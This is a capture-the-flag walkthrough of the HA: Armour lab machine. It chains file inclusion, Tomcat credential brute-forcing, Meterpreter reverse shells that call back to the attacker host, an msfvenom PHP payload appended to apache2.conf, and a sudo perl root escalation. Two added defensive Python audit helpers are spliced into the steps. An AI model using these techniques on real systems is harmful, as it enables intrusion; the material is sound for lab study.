Download link: click here
bilibili: click here
A host-discovery scan with nmap finds the target IP: 192.168.116.140
➜ ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
Nmap scan report for 192.168.116.1
Host is up (0.00031s latency).
Nmap scan report for 192.168.116.140
Host is up (0.00074s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
➜ ~ nmap -A -T4 192.168.116.140 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
Nmap scan report for 192.168.116.140
Host is up (0.0018s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Armour
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.24
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.24
65534/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA)
| 256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA)
| 256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
➜ ~
Ports 80, 8009 and 8080 are open and all three are web services: Apache httpd, Apache JServ (AJP) and Apache Tomcat respectively. Port 65534 is SSH.
Connecting to SSH on that port shows the first flag in the banner, HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}, together with a hint: TheOlympics
➜ ~ ssh 192.168.116.140 -p65534
The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts.
[ASCII-art banner, not reproduced]
www.hackingarticles.in HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}
Hint 1: TheOlympics
kali-team@192.168.116.140's password:
Browsing port 80 and opening the developer tools (F12) shows HTML comments containing armour, notes.txt and 69. At first the 69 was puzzling, but anyone familiar with the TCP/UDP port list can guess it is the port of TFTP (Trivial File Transfer Protocol); see the full TCP/UDP port list for details.
nmap with a UDP scan can check whether port 69 is open.
➜ ~ sudo nmap -sU -p69 192.168.116.140
[sudo] kali-team 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
Nmap scan report for 192.168.116.140
Host is up (0.00073s latency).
PORT STATE SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:E7:98:9F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
Because nmap has to craft UDP packets, it must be run with sudo as root. Port 69 is open on the target.
Connect with a TFTP client and download notes.txt to get the second flag.
➜ ~ atftp
tftp> connect 192.168.116.140
tftp> get notes.txt
tftp> quit
➜ ~ cat notes.txt
Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC}
Hint 2: maybeevena
➜ ~
There is another hint, maybeevena, whose meaning is not obvious yet. Next, brute-force .php files on port 80.
➜ ~ dirb http://192.168.116.140 -X .php
DIRB v2.22
START_TIME: Wed Oct 9 22:23:10 2019
URL_BASE: http://192.168.116.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.116.140/ ----
END_TIME: Wed Oct 9 22:23:13 2019
DOWNLOADED: 4612 - FOUND: 1
➜ ~
This finds file.php. The page is blank, so fuzz its parameter name.
➜ ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
Total requests: 77
===================================================================
000000033: 200 28 L 36 W 1437 Ch "file"
Total time: 0.130840
Processed Requests: 77
Filtered Requests: 76
Requests/sec.: 588.5036
➜ ~
The parameter is file, and it is a file read vulnerability. Since the server is Apache, the first thing to try is reading Apache's own files; a sensitive one is .htpasswd, usually located at /etc/apache2/.htpasswd
➜ ~ curl http://192.168.116.140/file.php\?file=/etc/apache2/.htpasswd
Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}
Hint 3: StarBucks
➜ ~
This gives the third flag and the third hint: StarBucks.
Official hint:
P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.
Concatenating the three hints gives TheOlympics + maybeevena + StarBucks = TheOlympicsmaybeevenaStarBucks, which is tried as the password.
Opening port 8080 in a browser shows the Tomcat manager page. The password is now known, so the username is what remains to be brute-forced.
➜ CeWL git:(master) ✗ ./cewl.rb -v http://192.168.116.140 -d 10 -w dict.txt
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Starting at http://192.168.116.140
Visiting: http://192.168.116.140, got response code 200
Attribute text found:
Offsite link, not following: https://hackingarticles.in
Writing words to file
➜ CeWL git:(master) ✗ cat dict.txt
Armour
PAGE
CONTENT
Header
ARMOUR
Collection
Armours
MCU
Photo
Grid
armour
End
Page
Content
Footer
Powered
Hacking
Articles
notes
txt
➜ CeWL git:(master) ✗ pwd
/home/kali-team/Kali-Team_Tools/CeWL
➜ CeWL git:(master) ✗
CeWL crawls the site on port 80 to generate a username wordlist; then MSF's tomcat_mgr_login module enumerates the Tomcat login.
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD TheOlympicsmaybeevenaStarBucks no The HTTP password to specify for authentication
PASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS 192.168.116.140 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /home/kali-team/Kali-Team_Tools/CeWL/dict.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/tomcat_mgr_login) >
For some reason it only enumerated successfully after I rebooted the server; the username is armour.
[+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucks
There are many ways to get a web shell onto Tomcat, including manually deploying a WAR file.
Using MSF saves time here.
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword
set httppassword
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
httppassword => TheOlympicsmaybeevenaStarBucks
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
httpusername => armour
msf5 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Retrieving session ID and CSRF token…
[*] Uploading and deploying wJ0oIWvcGX…
[*] Executing wJ0oIWvcGX…
[*] Undeploying wJ0oIWvcGX …
[*] Sending stage (53867 bytes) to 192.168.116.140
[*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800
meterpreter >
Enumerate locally listening ports
meterpreter > shell
Process 61 created.
Channel 75 created.
netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:65534 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 572/java
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::65534 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 572/java
tcp6 0 0 :::8009 :::* LISTEN 572/java
tcp6 0 0 192.168.116.140:50706 192.168.116.1:4444 ESTABLISHED 685/java
Port 8081 is listening on the target but only on localhost, so it has to be forwarded out; Meterpreter has a built-in portfwd command for this.
meterpreter > portfwd /?
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
[*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
meterpreter >
Now requesting port 8081 on the local machine returns the fourth flag.
➜ ~ curl http://127.0.0.1:8081
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
Alternatively, fetch it directly on the target:
tomcat@ubuntu:~$ cd /tmp
cd /tmp
tomcat@ubuntu:/tmp$ wget http://127.0.0.1:8081
wget http://127.0.0.1:8081
--2019-10-10 04:46:42-- http://127.0.0.1:8081/
Connecting to 127.0.0.1:8081… connected.
HTTP request sent, awaiting response… 200 OK
Length: 56 [text/html]
Saving to: ‘index.html’
index.html 100%[===================>] 56 --.-KB/s in 0s
2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56]
tomcat@ubuntu:/tmp$ cat index.html
cat index.html
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
tomcat@ubuntu:/tmp$
Find SGID files
tomcat@ubuntu:/$ find / -perm -g=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/wall
/usr/bin/bsd-write
/usr/bin/mlocate
tomcat@ubuntu:/$
Find SUID files
tomcat@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
tomcat@ubuntu:/$
tomcat@ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
find / -perm -4000 2>dev/null | xargs ls -la
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 04:05 /bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 17 2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
tomcat@ubuntu:/$
Find writable directories; /var/www/html is among them.
tomcat@ubuntu:/$ find / -writable -type d 2>/dev/null
find / -writable -type d 2>/dev/null
/dev/mqueue
/dev/shm
/tftpboot
/var/lib/php/sessions
/var/www/html
/var/tmp
/proc/902/task/902/fd
/proc/902/fd
/proc/902/map_files
/tmp
Find root-owned files that are writable
tomcat@ubuntu:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
<ev/null | grep -v "/proc/" |xargs ls -al |grep root
-rwxrwxrwx 1 root root 7224 Sep 21 11:30 /etc/apache2/apache2.conf
-rwxrwxrwx 1 root tomcat 2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
--w--w--w- 1 root root 0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
tomcat@ubuntu:/$
Both /etc/apache2/apache2.conf and /opt/tomcat/conf/tomcat-users.xml are writable.
/opt/tomcat/conf/tomcat-users.xml only contains the credentials already found, so /etc/apache2/apache2.conf is the file to look at.
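The two writable config files above are the kind of finding a host-hardening check should surface. The following is an added detection helper, not code from the original write-up: it parses `ls -al` lines in the format shown above (sample input constructed from that listing plus one correctly-permissioned file) and reports root-owned regular files that any user can write, skipping pseudo-filesystems where such modes are normal.

```python
# Added detection helper, not part of the original write-up: parses `ls -al` lines
# like the ones above and flags root-owned regular files that any user can write,
# the misconfiguration that lets a low-privileged account rewrite a service's config.
import re
from typing import List, Optional, Tuple

# Constructed sample: lines copied from the listing above plus one correctly-permissioned file.
LS_OUTPUT = """-rwxrwxrwx 1 root root 7224 Sep 21 11:30 /etc/apache2/apache2.conf
-rwxrwxrwx 1 root tomcat 2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
--w--w--w- 1 root root 0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
-rw-r--r-- 1 root root 1234 Oct 10 01:09 /etc/hosts
"""
# World-writable control files are normal on these pseudo-filesystems; skip them.
PSEUDO_FS = ("/proc/", "/sys/", "/dev/")
# Fields: mode [ACL/SELinux marker] links owner group size month day time-or-year path
LS_LINE = re.compile(r"^([-dlcbps][rwxsStT-]{9})[.+]?\s+\d+\s+(\S+)\s+(\S+)\s+\d+"
                     r"\s+\S+\s+\d+\s+\S+\s+(.+)$")

def parse_ls_line(line: str) -> Optional[Tuple[str, str, str, str]]:
    """Return (mode, owner, group, path), or None if the line is not an ls -l entry."""
    m = LS_LINE.match(line.strip())
    return m.groups() if m else None

def writable_by_others(mode: str) -> bool:
    """True when the 'other' write bit is set (character 8 of the symbolic mode)."""
    return mode[8] == "w"

def world_writable_root_files(ls_text: str) -> List[Tuple[str, str]]:
    """Return (path, group) for every root-owned regular file writable by everyone."""
    hits = []
    for line in ls_text.splitlines():
        parsed = parse_ls_line(line)
        if parsed is None:
            continue
        mode, owner, group, path = parsed
        if mode[0] != "-" or owner != "root" or path.startswith(PSEUDO_FS):
            continue  # not a regular file, not root-owned, or a pseudo-fs entry
        if writable_by_others(mode):
            hits.append((path, group))
    return hits
```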
Look at the passwd file. Each line has 7 colon-separated fields: username:password:UID:GID:comment:home directory:login shell.
The group file has 4 fields: group name:password:GID:member list.
tomcat@ubuntu:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
tomcat:x:1001:1001::/opt/tomcat:/bin/false
aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
tomcat@ubuntu:/$
tomcat@ubuntu:~$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,armour
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:armour
floppy:x:25:
tape:x:26:
sudo:x:27:armour
audio:x:29:
dip:x:30:armour
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:armour
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
input:x:104:
crontab:x:105:
syslog:x:106:
messagebus:x:107:
mlocate:x:108:
uuidd:x:109:
ssh:x:110:
armour:x:1000:
lpadmin:x:111:armour
sambashare:x:112:armour
ssl-cert:x:113:
tomcat:x:1001:
aarti:x:1002:
tomcat@ubuntu:~$
Two ordinary users are found: aarti and armour.
Download the Apache config file to your own machine; by default Apache runs as the www-data user:
http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf
Change the User and Group directives so that Apache starts as one of the ordinary users found above. Why not run it as root? Because Apache refuses to run as root without being recompiled, and the web service would simply fail to start. So it has to be aarti.
Overwrite the Apache config file
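The account review above, done by eye, is easy to script. The following is an added audit helper, not code from the original write-up: it parses /etc/passwd and /etc/group text in the 7-field and 4-field layouts described above (sample input constructed from a subset of the two listings) and reports which accounts have a real login shell and which privileged groups each belongs to, through either the primary GID or the member list.

```python
# Added audit helper, not part of the original write-up: parses /etc/passwd and
# /etc/group text in the field layouts described above and reports which accounts
# have a real login shell and which privileged groups each of them belongs to.
from typing import Dict, List

# Constructed sample input: a subset of the two listings shown above.
PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
tomcat:x:1001:1001::/opt/tomcat:/bin/false
aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
"""
GROUP = """root:x:0:
adm:x:4:syslog,armour
sudo:x:27:armour
tomcat:x:1001:
aarti:x:1002:
"""
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}
PRIVILEGED_GROUPS = {"root", "sudo", "adm", "wheel", "shadow", "disk", "docker"}

def parse_passwd(text: str) -> Dict[str, dict]:
    """Map user name -> uid, gid, gecos, home, shell (7 colon-separated fields)."""
    users = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            name, _pw, uid, gid, gecos, home, shell = line.split(":", 6)
            users[name] = {"uid": int(uid), "gid": int(gid), "gecos": gecos,
                           "home": home, "shell": shell}
    return users

def parse_group(text: str) -> Dict[str, dict]:
    """Map group name -> gid and explicit member list (4 colon-separated fields)."""
    groups = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            name, _pw, gid, members = line.split(":", 3)
            groups[name] = {"gid": int(gid), "members": [m for m in members.split(",") if m]}
    return groups

def interactive_accounts(passwd: str, group: str) -> Dict[str, List[str]]:
    """Return {user: sorted privileged groups} for every account with a login shell.
    Membership counts via the primary GID or via the group's explicit member list."""
    users, groups = parse_passwd(passwd), parse_group(group)
    gid_to_name = {g["gid"]: n for n, g in groups.items()}
    report = {}
    for name, u in users.items():
        if u["shell"] in NON_LOGIN_SHELLS:
            continue  # service account, cannot log in interactively
        mine = {gid_to_name.get(u["gid"], "")}
        mine |= {g for g, v in groups.items() if name in v["members"]}
        report[name] = sorted(mine & PRIVILEGED_GROUPS)
    return report
```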
tomcat@ubuntu:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
<p://192.168.116.1:8000/apache2.conf -O apache2.conf
--2019-10-10 04:52:49-- http://192.168.116.1:8000/apache2.conf
Connecting to 192.168.116.1:8000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 7195 (7.0K) [text/plain]
Saving to: ‘apache2.conf’
apache2.conf 100%[===================>] 7.03K --.-KB/s in 0s
utime(apache2.conf): Operation not permitted
2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195]
tomcat@ubuntu:/etc/apache2$ cat apache2.conf
After writing the config, the next step is to drop a web shell into the document root served on port 80 (this is the official author's approach). I tried it and it did not work: the file is created as the tomcat user, and aarti cannot read it, so it is not reachable and the server returns a 500 error.
Later I got a session by including the Apache config file itself.
That is, write the shell into apache2.conf and then use the file inclusion vulnerability found earlier.
➜ ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
➜ ~ cat shell.php >> apache2.conf
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.116.1:2333
[*] Sending stage (38288 bytes) to 192.168.116.140
[*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800
meterpreter > getuid
Server username: aarti (1002)
meterpreter > shell
Process 12388 created.
Channel 0 created.
python3.6 -c 'import pty;pty.spawn("/bin/bash")'
aarti@ubuntu:/var/www/html$ whoami
whoami
aarti
aarti@ubuntu:/var/www/html$
List passwordless sudo entries; there is one for perl.
aarti@ubuntu:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for aarti on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aarti may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/perl
aarti@ubuntu:/var/www/html$
aarti@ubuntu:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
sudo perl -e 'exec "/bin/bash";'
root@ubuntu:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/var/www/html#
root@ubuntu:~# ls
ls
final.txt
root@ubuntu:~# cat final.txt
cat final.txt
[ASCII-art banner, not reproduced]
IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF}
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
root@ubuntu:~#